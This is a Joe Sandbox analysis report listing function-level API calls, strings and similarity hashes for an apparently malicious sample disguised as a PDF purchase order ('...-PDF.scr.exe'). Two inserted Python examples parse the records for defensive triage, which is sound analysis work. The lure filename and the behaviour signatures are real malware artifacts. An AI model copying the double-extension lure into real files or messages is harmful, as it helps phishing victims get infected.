• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: MessageSend$BrushCreateDeleteObjectSolid
• String ID:
• API String ID: 3771399671-0
APIs
Similarity
• API ID: InitVariant$_malloc_wcscpy_wcslen
• String ID:
• API String ID: 3413494760-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 004377D7
• GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
• GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
• GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __wcsicoll
                                                                                                                                                                                                                                                                                                            • String ID: 0%d$DOWN$OFF
                                                                                                                                                                                                                                                                                                            • API String ID: 3832890014-468733193
                                                                                                                                                                                                                                                                                                            • Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                                                                                                                                                                                                                                                            • Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
APIs
• VariantInit.OLEAUT32(00000000), ref: 0045E959
• VariantCopy.OLEAUT32(00000000), ref: 0045E963
• VariantClear.OLEAUT32 ref: 0045E970
• VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
• __swprintf.LIBCMT ref: 0045EB1F
• VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
• VariantInit.OLEAUT32(00000000), ref: 0045EBE7
Strings
• %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d
• API String ID: 43541914-1568723262
• Opcode ID: 6a1a02ce3b022fb34617779b0441390f086caefb454479838db7f293f5ca1c44
• Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
• Opcode Fuzzy Hash: 6a1a02ce3b022fb34617779b0441390f086caefb454479838db7f293f5ca1c44
• Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID:
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 0-1603158881
• Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
• Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
• Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
• Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
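The per-function records above (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity) are what an analyst pivots on when hunting for the same code in other reports: the Instruction Fuzzy Hash and Opcode ID identify the function body, the API ID and String ID summarise what it calls and references, and the API String ID pairs the two (on this page, an empty API ID or String ID shows up as a 0 in the matching half, e.g. 0-1603158881 for the record with no APIs). The Python below is added here as an example and is not Joe Sandbox's own tooling: it parses records in the layout shown on this page into structured objects and indexes them by a Similarity field. The sample text is a constructed excerpt of the records above, and the record-boundary rule (a record opens with an "APIs" header, or with a "Strings" header once the previous record's Similarity block has been seen) is inferred from this listing, not from any Joe Sandbox specification.

```python
"""Parse Joe Sandbox per-function records from a plain-text report export.

Added example, not Joe Sandbox code. Record layout and the boundary rule are
inferred from the listing on this page; SAMPLE is a constructed excerpt of it.
"""
import re
from dataclasses import dataclass, field

SECTION_HEADERS = ("APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity")

# "Name.MODULE(args), ref: ADDR", optionally nested as a subcall annotation.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>[\w@?$]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)      # dicts: name, module, args, ref, sub
    strings: list = field(default_factory=list)   # (text, xref-or-None)
    source_file: str = ""
    offset: str = ""
    associated: list = field(default_factory=list)
    snapshot: str = ""
    similarity: dict = field(default_factory=dict)
    seen: set = field(default_factory=set)        # section headers seen so far

    def api_names(self):
        """Direct API calls of this function (subcall annotations excluded)."""
        return sorted({a["name"] for a in self.apis if a["sub"] is None})


def _strip_bullet(line):
    return line[1:].strip() if line.startswith("•") else line


def parse_records(text):
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            # Inferred boundary rule: "APIs" always opens a record; "Strings"
            # opens one only if the current record already has its Similarity.
            if cur is None or line == "APIs" or (
                    line == "Strings" and "Similarity" in cur.seen):
                cur = FunctionRecord()
                records.append(cur)
            section = line
            cur.seen.add(line)
            continue
        item = _strip_bullet(line)
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                cur.apis.append(m.groupdict())
        elif section == "Strings":
            if ", xrefs: " in item:
                text_, _, xref = item.rpartition(", xrefs: ")
                cur.strings.append((text_, xref))
            else:
                cur.strings.append((item, None))
        elif section == "Memory Dump Source":
            if item.startswith("Source File: "):
                m = re.match(r"Source File: (\S+), Offset: ([0-9A-Fa-f]+)", item)
                if m:
                    cur.source_file, cur.offset = m.groups()
            elif item.startswith("Associated: "):
                # Web export glues the "Download File" link text onto the path.
                path = item[len("Associated: "):].removesuffix("Download File")
                cur.associated.append(path.strip())
        elif section == "Joe Sandbox IDA Plugin" and item.startswith("Snapshot File: "):
            cur.snapshot = item[len("Snapshot File: "):]
        elif section == "Similarity":
            key, _, value = item.partition(":")
            cur.similarity[key.strip()] = value.strip()
    return records


def api_string_id_parts(rec):
    """Split 'API String ID' into (api_half, string_half) as shown on the page."""
    api_half, _, string_half = rec.similarity.get("API String ID", "").partition("-")
    return api_half, string_half


def index_by(records, key):
    """Index records by a Similarity field, e.g. 'Instruction Fuzzy Hash', for pivots."""
    out = {}
    for rec in records:
        value = rec.similarity.get(key)
        if value:
            out.setdefault(value, []).append(rec)
    return out


# Constructed excerpt of two records from this page (hashes copied from above).
SAMPLE = """\
APIs
• VariantInit.OLEAUT32(00000000), ref: 0045E959
• VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
• __swprintf.LIBCMT ref: 0045EB1F
  • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
Strings
• %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d
• API String ID: 43541914-1568723262
• Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 0-1603158881
• Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.similarity.get("Instruction Fuzzy Hash"), rec.api_names(),
              [s for s, _ in rec.strings])
```

Run it against a saved report export instead of SAMPLE, then feed `index_by(records, "Instruction Fuzzy Hash")` the records of a second report to find functions shared between two samples; subcall annotations are kept but excluded from `api_names()` so that a function is characterised by what it calls directly.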
APIs
• _memset.LIBCMT ref: 00479D1F
• VariantInit.OLEAUT32(?), ref: 00479F06
• VariantClear.OLEAUT32(?), ref: 00479F11
• VariantInit.OLEAUT32(?), ref: 00479DF7
  • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
  • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
  • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
• VariantClear.OLEAUT32(?), ref: 00479F9C
  • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Variant$Copy$ClearInit$ErrorLast_memset
                                                                                                                                                                                                                                                                                                            • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                                            • API String ID: 665237470-60002521
                                                                                                                                                                                                                                                                                                            • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                                                                                                                                                                                                                            • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: ConnectRegistry_wcslen
• String ID: HH
• API String ID: 535477410-2761332787
• Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
• Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
• Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
• Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
APIs
• _memset.LIBCMT ref: 0045F317
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
• IsMenu.USER32(?), ref: 0045F380
• CreatePopupMenu.USER32 ref: 0045F3C5
• GetMenuItemCount.USER32(?), ref: 0045F42F
• InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup_memset
• String ID: 0$2
• API String ID: 3311875123-3793063076
• Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
• Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
• Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
• Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
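The per-function records in this listing (direct API calls with their `ref:` addresses, entries marked "Part of subcall function" that belong to a callee, resolved strings with xrefs, and the Similarity hashes) are easier to triage once pulled into structured form. The Python below is an added example and is not part of the Joe Sandbox report or its tooling: it parses three records copied from this page's listing (constructed input, trimmed to the fields the parser needs), returns each function's direct-call sequence in address order, and applies a small API watchlist that is this example's own assumption rather than a Joe Sandbox category.

```python
import re
from collections import Counter

# Constructed input: three per-function records in the "APIs / Strings /
# Memory Dump Source / Similarity" layout used by the report listing above.
SAMPLE = r"""
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ConnectRegistry_wcslen
• String ID: HH
• Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
APIs
• _memset.LIBCMT ref: 0045F317
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
• IsMenu.USER32(?), ref: 0045F380
• CreatePopupMenu.USER32 ref: 0045F3C5
• GetMenuItemCount.USER32(?), ref: 0045F42F
• InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup_memset
• Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
APIs
• GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe), ref: 0043719E
• LoadStringW.USER32(00000000), ref: 004371A7
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
• LoadStringW.USER32(00000000), ref: 004371C0
• _printf.LIBCMT ref: 004371EC
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
Strings
• C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, xrefs: 00437189
• %s (%d) : ==> %s: %s %s, xrefs: 004371E7
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# One API entry: optional "Part of subcall function XXXXXXXX: " prefix,
# Name.MODULE, optional "(args)", then "ref: XXXXXXXX".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}): )?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$"
)

# Example's own watchlist (assumption): APIs worth a second look during triage.
WATCHLIST = {
    "RegConnectRegistryW": "registry access that can target another machine",
    "MessageBoxW": "modal UI; a sandbox run may need to dismiss it",
}


def parse_records(text):
    """Split the listing into records, one per 'APIs' header."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs":
                current = {"apis": [], "strings": [], "similarity": {}, "source": None}
                records.append(current)
            section = line
            continue
        if current is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                current["apis"].append({
                    "name": m["name"], "module": m["module"], "ref": m["ref"],
                    "caller": m["caller"],  # None for the function's own calls
                    "args": m["args"].split(",") if m["args"] else [],
                })
        elif section == "Strings":
            value, _, xref = body.rpartition(", xrefs: ")
            current["strings"].append((value, xref))
        elif section == "Similarity":
            key, _, value = body.partition(": ")
            current["similarity"][key] = value
        elif section == "Memory Dump Source" and body.startswith("Source File: "):
            current["source"] = body[len("Source File: "):]
    return records


def api_sequence(record):
    """The function's own calls (subcall entries excluded), in address order."""
    direct = [a for a in record["apis"] if a["caller"] is None]
    return [a["name"] for a in sorted(direct, key=lambda a: int(a["ref"], 16))]


def triage(records, watchlist=WATCHLIST):
    """Return (Counter of direct API names, {record index: watchlisted APIs hit})."""
    counts, flagged = Counter(), {}
    for idx, rec in enumerate(records):
        seq = api_sequence(rec)
        counts.update(seq)
        hits = [n for n in dict.fromkeys(seq) if n in watchlist]
        if hits:
            flagged[idx] = hits
    return counts, flagged


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    counts, flagged = triage(recs)
    for idx, hits in flagged.items():
        print(idx, " -> ".join(api_sequence(recs[idx])), "|", ", ".join(f"{h}: {WATCHLIST[h]}" for h in hits))
    print(counts.most_common(5))
```

Keeping subcall entries apart from the function's own calls matters: a callee's `GetLastError` or `VariantCopy` says nothing about the function being read, and collapsing them inflates the API counts. The Instruction Fuzzy Hash survives in the record so matches can be cross-referenced against other analyses of the same sample.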
APIs
• GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe), ref: 0043719E
• LoadStringW.USER32(00000000), ref: 004371A7
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
• LoadStringW.USER32(00000000), ref: 004371C0
• _printf.LIBCMT ref: 004371EC
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
Strings
• C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, xrefs: 00437189
• %s (%d) : ==> %s: %s %s, xrefs: 004371E7
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: HandleLoadModuleString$Message_printf
                                                                                                                                                                                                                                                                                                            • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
                                                                                                                                                                                                                                                                                                            • API String ID: 220974073-1901747113
                                                                                                                                                                                                                                                                                                            • Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                                                                                                                                                                                                                                            • Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
